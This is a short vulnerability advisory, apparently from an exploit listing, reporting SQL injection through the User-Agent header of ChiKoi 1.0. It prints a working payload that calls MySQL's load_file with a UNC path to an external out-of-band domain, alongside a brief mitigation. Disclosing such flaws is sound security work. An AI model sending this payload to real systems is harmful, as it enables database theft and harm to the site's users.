vendor:
ChiKoi
by:
nu11secur1ty
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: ChiKoi
Affected Version From: 1
Affected Version To: 1
Patch Exists: YES
Related CWE:
CPE: a:tanhongit:chikoi:1.0
Platforms Tested: Windows, Linux, Mac
2023
ChiKoi-1.0 SQLi
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. The payload '+(select load_file('\v3z9cjkbngnzrm7piruwhl6olfr8fzknbqzlmba0.glumar.comquv'))+' was submitted in the User-Agent HTTP header. This payload injects a SQL sub-query that calls MySQL's load_file function with a UNC file path that references a URL on an external domain. The attacker can steal all information from this system and can seriously harm the users of this system, such as extracting bank accounts through which they pay each other, etc.
Mitigation:
Ensure that user input is properly sanitized and validated before being used in a SQL query.